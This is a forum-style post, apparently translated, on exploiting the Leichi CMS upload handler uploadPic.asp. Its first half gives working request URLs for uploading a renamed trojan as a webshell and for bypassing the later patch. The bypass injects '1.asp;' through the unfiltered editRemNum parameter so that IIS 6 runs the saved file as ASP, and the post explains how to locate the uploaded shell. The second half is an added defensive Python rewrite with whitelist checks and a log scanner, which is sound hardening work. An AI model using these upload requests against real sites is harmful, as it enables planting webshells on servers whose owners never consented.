I gather this came out around April. It may be useful to friends; if it helps you, give it a bump.
The Leichi upload vulnerability was used a long time ago, and a patch was released later.
Someone asked me to look at a few sites, and every Leichi install I found had the patch applied. Then I happened to look at the code and found this.
The following is an introduction to the Leichi upload vulnerability.
============================================================
Assume that Leichi's upload file uploadPic.asp sits in the admin directory, i.e. admin/uploadPic.asp.
The vulnerability can be exploited as follows:
Enter in the browser: http://www.xxxx.com/admin/uploadPic.asp?actionType=mod&picName=webshell.asp and upload a local file, after renaming our trojan so that it ends in .gif. You then get a webshell named webshell.asp!
Note: how do we know where the webshell we uploaded ended up?
Look here: open an article the site has published that contains an image, right-click the image and view its properties. That reveals the directory the trojan was uploaded to; our trojan should be at http://www.xxxx.com/admin/upload/webshell.asp
============================================================
After the patch, the code strips characters such as the dot from the name: when the supplied file name is 1.asp, the returned file name becomes 1asp.gif.
Dim upload_code, remNum, remFileName, editImageNum, actionType, editRemNum, picName
upload_code  = Trim(Request.QueryString("upload_code"))
editImageNum = Trim(Request.QueryString("editImageNum"))
actionType   = Trim(Request.QueryString("actionType"))
picName      = Trim(Request.QueryString("picName"))
editRemNum   = Trim(Request.QueryString("editRemNum"))
If actionType = "mod" Then
    picName = Right(picName, InstrRev(picName, "/") - 1)
End If
If upload_code = "OK" Then
    ' fetch the image belonging to the article
    Dim upload, file, formName, formPath, iCount
    formPath = "../uppic/"
    .........
Else
    If file.FileSize > 0 Then    ' file data is present
        ' generate the image name
        If actionType = "mod" Then
            ' patched branch: the dot is stripped, so 1.asp becomes 1asp.gif
            remFileName = Replace(Right(picName, Len(picName) - InstrRev(picName, "/")), ".", "") & ".gif"
        Else
            If editRemNum <> "" Then
                ' editRemNum is taken straight from the query string, unfiltered
                remNum = editRemNum
            Else
                Randomize
                remNum = Int((999 - 1 + 1) * Rnd + 1) & Day(Date) & Month(Date) & Year(Date) & Hour(Time) & Minute(Time) & Second(Time)
            End If
            remFileName = remNum & "_" & (editImageNum + 1) & ".gif"
        End If
        file.SaveAs Server.MapPath(formPath & remFileName)    ' save the file
        Response.Write(formPath & remFileName)
We can see that when editRemNum is not empty, remFileName = remNum & "_" & (editImageNum + 1) & ".gif", and remNum is simply editRemNum.
Because that parameter is accepted without any filtering, the request uploadPic.asp?actionType=od&editRemNum=1.asp;&upload_code=OK&editImageNum=1
gets you a webshell named 1.asp;_2.gif
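The defensive lesson of the code above is that only one of the three inputs (picName) was sanitised while the other two (editRemNum, editImageNum) were concatenated into the saved name as-is, and that the name as a whole was never checked against the shape the handler is supposed to produce. On IIS 6 a name like 1.asp;_2.gif is handled as ASP because the server stops at the semicolon, so forcing the trailing ".gif" alone is not a sufficient check. The following Python example, added here and not part of the Leichi code or the original write-up, rewrites the naming logic in hardened form: every parameter is whitelisted, the random branch mirrors the page's Int((999-1+1)*Rnd+1) & date/time expression, and a final gate rejects any result that does not match the expected pattern. It also includes a small log-review check that flags saved names outside that pattern. All function names, the regular expressions, FIXED_TIME and the UPLOAD_LOG lines are assumptions constructed for illustration.

```python
import re
import random
from datetime import datetime

# Added example (not Leichi's code): a hardened Python rewrite of the
# file-naming logic in uploadPic.asp. Every name, pattern and sample value
# below is an assumption made for illustration.

ALLOWED_EXT = ".gif"
# The only shape a generated name may have: one safe token, then exactly ".gif".
SAFE_NAME_RE = re.compile(r"[A-Za-z0-9_-]{1,80}\.gif")

# Constructed timestamp so the random-name branch is reproducible.
FIXED_TIME = datetime(2009, 4, 12, 10, 1, 33)


class UploadNameError(ValueError):
    """Raised when request parameters cannot produce a safe file name."""


def basename_no_dots(pic_name):
    """Keep the part after the last '/' or '\\', then drop every character
    outside [A-Za-z0-9_-]. Stricter than the page's Replace(name, ".", "")."""
    tail = re.split(r"[\\/]", pic_name)[-1]
    cleaned = re.sub(r"[^A-Za-z0-9_-]", "", tail)
    if not cleaned:
        raise UploadNameError("picName contains no usable characters")
    return cleaned[:80]


def random_rem_num(now=None, rnd=None):
    """Mirror of the ASP expression
    Int((999-1+1)*Rnd+1) & Day & Month & Year & Hour & Minute & Second."""
    now = now or datetime.now()
    rnd = random.randint(1, 999) if rnd is None else rnd
    return f"{rnd}{now.day}{now.month}{now.year}{now.hour}{now.minute}{now.second}"


def is_expected_upload_name(name):
    """True only for names of the shape the upload handler is supposed to write."""
    return SAFE_NAME_RE.fullmatch(name) is not None


def build_image_name(action_type, pic_name="", edit_rem_num="", edit_image_num="0",
                     now=None, rnd=None):
    """Hardened equivalent of the remFileName computation in uploadPic.asp."""
    if action_type == "mod":
        name = basename_no_dots(pic_name) + ALLOWED_EXT
    else:
        if edit_rem_num:
            # The page's bug: editRemNum was concatenated unfiltered, so
            # editRemNum=1.asp; produced 1.asp;_2.gif. Allow digits only.
            if not re.fullmatch(r"[0-9]{1,32}", edit_rem_num):
                raise UploadNameError(f"editRemNum must be digits only, got {edit_rem_num!r}")
            rem_num = edit_rem_num
        else:
            rem_num = random_rem_num(now, rnd)
        if not re.fullmatch(r"[0-9]{1,9}", edit_image_num):
            raise UploadNameError(f"editImageNum must be a small integer, got {edit_image_num!r}")
        name = f"{rem_num}_{int(edit_image_num) + 1}{ALLOWED_EXT}"
    # Final gate: whichever branch ran, the result must match the whitelist.
    if not is_expected_upload_name(name):
        raise UploadNameError(f"generated name {name!r} failed the whitelist")
    return name


def scan_upload_log(log_text):
    """Return the file names in an upload log that do not fit the expected shape.
    Each non-empty line is assumed to end with the saved path (constructed format)."""
    flagged = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        saved_path = line.split()[-1]
        name = re.split(r"[\\/]", saved_path)[-1]
        if not is_expected_upload_name(name):
            flagged.append(name)
    return flagged


# Constructed sample log: one legitimate name and the two names from the write-up.
UPLOAD_LOG = """\
2009-04-12 10:01:33 /admin/uppic/1_1.gif
2009-04-12 10:02:10 /admin/uppic/1.asp;_2.gif
2009-04-12 10:03:45 /admin/upload/webshell.asp
"""

if __name__ == "__main__":
    print(build_image_name("od", edit_rem_num="1", edit_image_num="1"))  # 1_2.gif
    print(build_image_name("mod", pic_name="../upload/1.asp"))           # 1asp.gif
    try:
        build_image_name("od", edit_rem_num="1.asp;", edit_image_num="1")
    except UploadNameError as exc:
        print("rejected:", exc)
    print(scan_upload_log(UPLOAD_LOG))  # ['1.asp;_2.gif', 'webshell.asp']
```

The design point is the final gate: even if a future change adds another naming branch, nothing reaches SaveAs unless the complete name matches one known-good pattern, which is what the original code lacked. The log scan applies the same pattern to what was actually written to disk, so a name containing a semicolon or a second extension shows up in review regardless of how it got there.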